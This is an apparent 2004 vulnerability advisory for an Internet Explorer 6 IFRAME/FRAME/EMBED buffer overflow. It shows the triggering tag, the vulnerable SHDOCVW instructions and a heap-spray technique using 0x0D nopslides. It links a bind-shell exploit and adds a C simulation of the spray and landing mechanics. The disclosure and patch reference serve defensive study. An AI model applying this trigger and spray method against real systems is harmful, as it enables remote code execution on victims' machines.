From Skypher (www.edup.tudelft.nl/~bjwever/)
Internet Explorer IFRAME src&name parameter BoF remote compromise
There is an exploitable buffer overflow (BoF) in the FRAME, EMBED and IFRAME tags when the SRC and NAME attributes are used together. To trigger the BoF you only need this tag in an HTML file:
- <IFRAME SRC=AAAAAAAAAAAA.... NAME="BBBBBBBBBBB....">
This overwrites EAX with 0x00420042 (the NAME string is stored as UTF-16LE, so the bytes 42 00 42 00 of two "B" characters are read as that DWORD), after which this code in SHDOCVW.DLL gets executed:

    7178EC02  8B08           MOV ECX, DWORD PTR [EAX]
    7178EC04  68 847B7071    PUSH SHDOCVW.71707B84
    7178EC09  50             PUSH EAX
    7178EC0A  FF11           CALL NEAR DWORD PTR [ECX]

Control over EAX gives control over ECX (ECX = [EAX]), and CALL [ECX] then loads EIP from the address ECX points to: remote command execution.
The problem exists in Internet Explorer 6.0 on Windows 2000 and Windows XP, all service packs except XP SP2.
exploits/InternetExploiter.zip contains InternetExploiter.html, the actual exploit. When you open this .html file in MSIE, it tries to exploit the vulnerability to bind a shell to port 28876.
The exploit sprays memory with nopslides of 0x0D bytes followed by the shellcode, so that [0x0D0D0D0D] == 0x0D0D0D0D. It's not the most efficient thing in the world, but it works like a charm for most IE bugs. The BoF sets EAX to 0x0D0D0D0D, after which the code above gets executed: ECX = [EAX] = 0x0D0D0D0D, and CALL [ECX] jumps to 0x0D0D0D0D. We land inside one of the nopslides and slide on down to the shellcode (0x0D decodes as OR EAX, imm32, a harmless 5-byte instruction, so the slide executes correctly from any entry offset).
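As an added example (not code from this advisory or from InternetExploiter), the following C program models the two mechanics described above: how the UTF-16 NAME string determines the DWORD that overwrites EAX (0x00420042 for "BB"), and why the sprayed 0x0D nopslides must satisfy [0x0D0D0D0D] == 0x0D0D0D0D for the MOV ECX,[EAX] / CALL [ECX] gadget to reach them. The address space is simulated (nothing is mapped at 0x0D0D0D0D in this process), the shellcode is a constructed INT3 marker, and the 4-byte NOP pad in front of it is this model's own addition: the last OR EAX, imm32 of the slide can overshoot the slide end by up to 4 bytes, and the pad absorbs that regardless of where in the slide execution enters.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LAND_ADDR  0x0D0D0D0Du  /* value the exploit leaves in EAX */
#define SLIDE_BYTE 0x0D         /* x86 opcode 0x0D = OR EAX, imm32 (5 bytes) */
#define NOP_BYTE   0x90

/* (1) NAME is stored as UTF-16LE, so the DWORD written into EAX is the first
 * two code units read little-endian: "BB" gives 0x00420042 as in the advisory. */
uint32_t eax_from_name(const uint16_t *name_utf16) {
    return (uint32_t)name_utf16[0] | ((uint32_t)name_utf16[1] << 16);
}

/* Inverse: the two code units the NAME string must start with to set EAX. */
void name_units_for_eax(uint32_t eax, uint16_t out[2]) {
    out[0] = (uint16_t)(eax & 0xFFFFu);
    out[1] = (uint16_t)(eax >> 16);
}

/* (2) A simulated sprayed block: simulated address a maps to mem[a - base]. */
typedef struct {
    uint32_t base;
    size_t   slide_len, pad_len, len;
    uint8_t *mem;
} spray_t;

/* Constructed stand-in for the shellcode (INT3s), not real shellcode. */
static const uint8_t SHELLCODE_MARKER[4] = { 0xCC, 0xCC, 0xCC, 0xCC };

/* Layout: slide_len bytes of 0x0D, pad_len NOPs (this model's assumption),
 * then the marker. Returns 1 on success. */
int spray_build(spray_t *s, uint32_t base, size_t slide_len, size_t pad_len) {
    s->base = base; s->slide_len = slide_len; s->pad_len = pad_len;
    s->len = slide_len + pad_len + sizeof SHELLCODE_MARKER;
    s->mem = malloc(s->len);
    if (!s->mem) return 0;
    memset(s->mem, SLIDE_BYTE, slide_len);
    memset(s->mem + slide_len, NOP_BYTE, pad_len);
    memcpy(s->mem + slide_len + pad_len, SHELLCODE_MARKER, sizeof SHELLCODE_MARKER);
    return 1;
}

static int read32(const spray_t *s, uint32_t addr, uint32_t *out) {
    if (addr < s->base || (uint64_t)addr + 4 > (uint64_t)s->base + s->len) return 0;
    memcpy(out, s->mem + (addr - s->base), 4);
    return 1;
}

/* Emulate the SHDOCVW gadget: ECX = [EAX]; EIP = [ECX]. Both loads must hit
 * the spray, which is why [0x0D0D0D0D] must equal 0x0D0D0D0D: the slide bytes
 * double as the pointer that CALL [ECX] follows. Returns 1 if both loads hit. */
int gadget_eip(const spray_t *s, uint32_t eax, uint32_t *eip) {
    uint32_t ecx;
    if (!read32(s, eax, &ecx)) return 0;
    return read32(s, ecx, eip);
}

/* Decode from eip as the CPU would: 0x0D consumes 5 bytes, 0x90 one byte.
 * Returns the block offset of the first other opcode fetched (where the
 * shellcode starts executing), or -1 if execution ran off the block. */
long slide_landing(const spray_t *s, uint32_t eip) {
    uint32_t a = eip;
    for (;;) {
        if (a < s->base || (uint64_t)a >= (uint64_t)s->base + s->len) return -1;
        uint8_t op = s->mem[a - s->base];
        if (op == SLIDE_BYTE) a += 5;
        else if (op == NOP_BYTE) a += 1;
        else return (long)(a - s->base);
    }
}

/* 1 if every entry offset inside the slide ends up exactly at the marker. */
int all_entries_land(const spray_t *s) {
    long want = (long)(s->slide_len + s->pad_len);
    for (size_t off = 0; off < s->slide_len; off++)
        if (slide_landing(s, s->base + (uint32_t)off) != want) return 0;
    return 1;
}

int main(void) {
    uint16_t bb[2] = { 0x0042, 0x0042 }, units[2];
    printf("EAX from NAME=\"BB\": 0x%08X\n", eax_from_name(bb));
    name_units_for_eax(LAND_ADDR, units);
    printf("NAME code units for EAX=0x%08X: U+%04X U+%04X\n", LAND_ADDR, units[0], units[1]);

    spray_t s;
    if (!spray_build(&s, 0x0D0D0000u, 4096, 4)) return 1;
    uint32_t eip = 0;
    if (gadget_eip(&s, LAND_ADDR, &eip))
        printf("gadget: EAX=0x%08X -> EIP=0x%08X, lands at block offset %ld\n",
               LAND_ADDR, eip, slide_landing(&s, eip));
    printf("every slide entry reaches the shellcode with 4-byte pad: %s\n",
           all_entries_land(&s) ? "yes" : "no");
    free(s.mem);
    return 0;
}
```

Building the same block with pad_len = 0 makes all_entries_land() fail: an entry whose 5-byte stride ends inside the marker eats its first bytes as an immediate, which is the alignment failure the pad exists to remove.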
The shellcode is encoded into a unicode string using my own Beta shellcode encoder.
2004-10-24  ned discovers bug in IE.
2004-10-25  Bug turns out to be a BoF, advisory released.
A patch is available from the Microsoft Corporation website (Cumulative Security Update for Internet Explorer, 889293).
- exploits/InternetExploiter.zip: Internet Explorer IFRAME src&name parameter BoF remote compromise exploit.
- beta shellcode encoder: documentation.
- src/beta.c: C source file for the current version of the beta shellcode encoder.
- CERT: Microsoft Internet Explorer vulnerable to buffer overflow via FRAME, IFRAME, and EMBED elements.
- Secunia: Internet Explorer IFRAME Buffer Overflow Vulnerability.
- ZDNet news: Exploit code makes IE flaw more dangerous.
- Techworld: Microsoft stalls on vast Explorer exploit.
- Wall Street Journal: "Mydoom Worm Renews Debate On Cyber-Ethics" by David Bank.
- Microsoft Corporation website: Cumulative Security Update for Internet Explorer (889293)